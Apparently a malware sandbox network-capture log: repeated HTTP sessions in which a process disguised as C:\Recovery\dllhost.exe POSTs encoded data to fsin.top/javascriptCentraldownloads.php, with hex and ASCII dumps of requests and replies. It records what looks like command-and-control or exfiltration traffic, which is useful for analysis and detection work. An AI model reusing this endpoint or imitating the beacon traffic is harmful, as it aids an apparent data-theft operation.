                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sli4vDsCcKslcGcztj1CYDF6gTZC6Ed3a7Jgwo%2FwbOuGSe610wUOw1M8M%2FsVHNvAB2pfXSqwIT3OaBXNZrul5GIZBpixkx2n6iuzZ4Z3bbdnfuK4XpYtz6529g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c3bae308c9b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  133 | 192.168.2.4 | 49870 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:39:01.400074005 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:01.755938053 CEST | 1012 | OUT | Data Raw: 54 5f 5d 55 5f 5a 58 51 5c 5e 5a 51 54 57 57 53 57 57 5e 56 56 5a 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T_]U_ZXQ\^ZQTWWSWW^VVZQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[$"! '%+\?.T)C&X2;'1%$0#,'\" 15&G#.X!
                                                  Aug 1, 2024 07:39:01.844746113 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:02.092437983 CEST | 577 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CkuBwJrUXiec1U5Oj%2Bt8AiAR3Tzfe0WTbzjRJWFcAFuzNSbQ9W11bJ6EPGCPPhKOSZIRkq7MCbmlIHuqwQtKrVvMPoOSNMzeRDGUibl9m6fUnucR5DEbYV%2Faw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c403b3fc41d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a
                                                  Data Ascii: 40W[Y
                                                  Aug 1, 2024 07:39:02.179034948 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  134 | 192.168.2.4 | 49871 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:39:02.200309992 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:02.552939892 CEST | 1284 | OUT | Data Raw: 54 57 5d 51 5a 59 58 50 5c 5e 5a 51 54 51 57 5b 57 52 5e 58 56 5b 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TW]QZYXP\^ZQTQW[WR^XV[QX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X0!5]6'#^(+>R)>\&84'/23(U,-$641&G#.X!
                                                  Aug 1, 2024 07:39:02.670185089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:02.909406900 CEST | 731 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsQCQvt10Nnwjhnv9uCYdpleJeHg7OsMXPZZHIYxi%2F93rQA6vxf5ufFb40zwjBSh2nlkaNVkf43m0bLJlmOVkQdNIUoQ%2F1SMsMw2GXAFOhgYweCjWCY1H79WeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c455c5642c1-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 51 27 2b 3a 1d 35 3a 0a 55 29 54 29 57 3d 0a 20 14 28 29 23 1b 26 2f 39 5e 32 28 34 1c 21 05 2d 58 30 11 21 0d 32 21 32 5b 2a 27 21 51 04 11 25 02 23 1d 26 5e 29 00 27 5c 33 38 01 5b 23 36 28 1f 24 1d 29 57 20 2a 28 59 29 31 39 13 2b 1c 20 0b 2d 2b 3f 1a 2b 55 2c 10 27 26 2a 56 0d 17 21 0d 2d 2b 27 0f 30 54 38 55 34 3c 0d 11 20 38 21 58 29 3f 00 5c 29 24 07 06 39 23 24 03 3e 0a 2d 09 2a 2d 29 12 3e 2a 2d 1b 24 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"Q'+:5:U)T)W= ()#&/9^2(4!-X0!2!2[*'!Q%#&^)'\38[#6($)W *(Y)19+ -+?+U,'&*V!-+'0T8U4< 8!X)?\)$9#$>-*-)>*-$9"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  135 | 192.168.2.4 | 49872 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:39:02.315205097 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:02.662374020 CEST | 1012 | OUT | Data Raw: 54 56 58 55 5f 5f 58 53 5c 5e 5a 51 54 5f 57 56 57 57 5e 59 56 54 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TVXU__XS\^ZQT_WVWW^YVTQ][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[3=#=<0,(+)>&*1; %>%#V83]5 2%&G#.X!
                                                  Aug 1, 2024 07:39:02.769439936 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:02.921621084 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzaZ3NGXa1pSFS5qArrN%2Fntlq%2BBomGF6P82QaMcjFA%2Fpk85Rmznw0nQBZBvUUykrrSIIA%2B77ZR2SeVfrepaXYQGtnXhw7Qtw0BEND2yytUNVy8dtO8WG8J22jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c460c5642e5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  136 | 192.168.2.4 | 49873 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:39:03.241097927 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:39:03.600594997 CEST | 1012 | OUT | Data Raw: 51 55 58 5c 5a 5c 5d 53 5c 5e 5a 51 54 54 57 50 57 51 5e 5e 56 5c 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUX\Z\]S\^ZQTTWPWQ^^V\QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^0)^!8Z'S<)(*T?5Y28&Y)&3S--$!7&&G#.X!,
                                                  Aug 1, 2024 07:39:03.684453964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:03.936506033 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:03 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JfxerWqZzHsHv6ERI%2FjRjCxfddQXuSZ5jOaAojmhtaucukhJgAjcTGDFaKorCZnieyESuugKBM8JDWRT3BnKXrRcJocsKhlup%2B%2FtaMhq%2BlhRLFSxa4fuIWw4%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c4bcfa87cf6-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  137 | 192.168.2.4 | 49874 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:39:04.054843903 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:04.412863970 CEST | 1012 | OUT | Data Raw: 51 53 58 56 5a 5c 58 57 5c 5e 5a 51 54 51 57 5b 57 5e 5e 56 56 5d 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSXVZ\XW\^ZQTQW[W^^VV]Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y%2_!70;?8>S*%!&;4&>13#/='^6/Y&5&G#.X!
                                                  Aug 1, 2024 07:39:04.521378994 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:04.771128893 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:04 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sp2cZcz3MHF%2FLNqXQ2TaruBqOdwaQm1aX0Q9l99UQBl6nftWZjlUvqsjQrvW5Pui3Pu18EiKWP0Cwzg2%2BkNr8Ij4O6L6n3awC%2B4V%2BYUM3WXZo1fihxnp6DCMHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c50fadd176c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  138 | 192.168.2.4 | 49875 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:39:04.897499084 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:05.256345034 CEST | 1008 | OUT | Data Raw: 54 55 5d 55 5f 58 58 56 5c 5e 5a 51 54 56 57 57 57 51 5e 58 56 5e 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TU]U_XXV\^ZQTVWWWQ^XV^Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z$29#=4$;Y(T)%^2(S%*[10(R/.!;;15&G#.X!4
                                                  Aug 1, 2024 07:39:05.371817112 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:05.611660004 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sLPAIF2WASuiGcLJ%2FnJMOvE%2BDRCmKtnIxbkR4wJMf0MNR4SDBEgSUHJ9qXqMGzAAgxAw%2BW9GL3XfO8EwTDj3OKLByd0FvVoDIsy%2FAdy%2Bhkk3d6LwTpC%2Bz8xUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c564e3872b9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  139 | 192.168.2.4 | 49876 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:05.743427038 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:06.099889040 CEST1008OUTData Raw: 51 57 58 53 5f 5d 5d 51 5c 5e 5a 51 54 56 57 55 57 55 5e 57 56 54 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QWXS_]]Q\^ZQTVWUWU^WVTQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^%2Z!.70S;+&*"^%+;%%(W/=;6('^%&G#.X!<
                                                  Aug 1, 2024 07:39:06.190793037 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:06.415210009 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKIzHg9mbDOa%2FtawYCsg1M48%2B0l48XcQ9JZubUi%2Fb6YXorZr0bepP%2BKKPAF6XP%2FGOGHJjujpNeQZ9fc0OcXU1PhFqNoeDJNJeb2b8fGXnekjuwHuwpDAXxgyVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c5b6941440d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  140 | 192.168.2.4 | 49877 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:06.549582958 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:06.896562099 CEST1012OUTData Raw: 54 51 58 50 5a 5b 58 5c 5c 5e 5a 51 54 55 57 50 57 50 5e 56 56 54 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXPZ[X\\^ZQTUWPWP^VVTQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!3*!&%(?"*%++Q1Y2Z2U;/\67^%&G#.X!(
                                                  Aug 1, 2024 07:39:07.006580114 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:07.256700039 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7evcqh8sODgMSZ4nkNsp5Sn6pTEqRsA91zkG4b8p6PdePbRbdYkxQUWeB%2F3yPJaLXk%2FYVcQPmKcfPVDzRcJAR1oGAxxNtpWVp01gNslBEt2QiyWMalflw7aRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c6088258c78-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  141 | 192.168.2.4 | 49878 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:07.511245966 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:07.886281013 CEST1012OUTData Raw: 54 5e 58 51 5f 5a 58 5d 5c 5e 5a 51 54 53 57 51 57 55 5e 56 56 5a 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XQ_ZX]\^ZQTSWQWU^VVZQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$2!!=<X$ (]->&"&^8&/)1 8='^5;;]&%&G#.X!0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  142 | 192.168.2.4 | 49879 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:07.945930004 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1252
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:08.302906036 CEST1252OUTData Raw: 54 5e 58 53 5f 5d 58 53 5c 5e 5a 51 54 56 57 51 57 5f 5e 5e 56 5a 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XS_]XS\^ZQTVWQW_^^VZQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'!#-80,)+.R>6>&8&<>Y%#/>'6#1&G#.X!,
                                                  Aug 1, 2024 07:39:08.400645971 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:08.571106911 CEST737INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HUD7VqLB5aMfyf9Qsk4YRYcob85q%2FasVdt9hGNCgZ6Uv801893lfAbEN2IdrzBNfjwcHeba%2BiG%2BUcQXIgRm5TGNlYs%2BYM5wt7FD8X%2F3NiKbOUGz2alvakoHUxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c693e28426b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 1e 27 01 39 0f 20 39 33 0a 28 22 31 50 2b 30 24 5c 2a 3a 3b 5f 31 12 39 58 31 01 3c 52 21 05 31 58 27 59 2a 1d 31 1c 0c 5f 29 1d 21 51 04 11 26 5f 20 1d 21 04 29 07 34 01 30 38 28 01 23 25 3f 02 27 20 35 1c 22 17 16 16 2a 21 21 58 2b 0c 0e 0f 3a 2b 34 06 2b 33 24 5b 31 36 2a 56 0d 17 22 50 2d 16 23 09 26 21 2f 0d 22 3f 3f 53 21 2b 03 13 3e 01 22 5a 2a 24 3e 12 2d 33 0d 5f 3d 0d 3e 52 2b 2d 3d 13 3f 14 0f 19 33 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"'9 93("1P+0$\*:;_19X1<R!1X'Y*1_)!Q&_ !)408(#%?' 5"*!!X+:+4+3$[16*V"P-#&!/"??S!+>"Z*$>-3_=>R+-=?39"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  143 | 192.168.2.4 | 49880 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:08.229049921 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
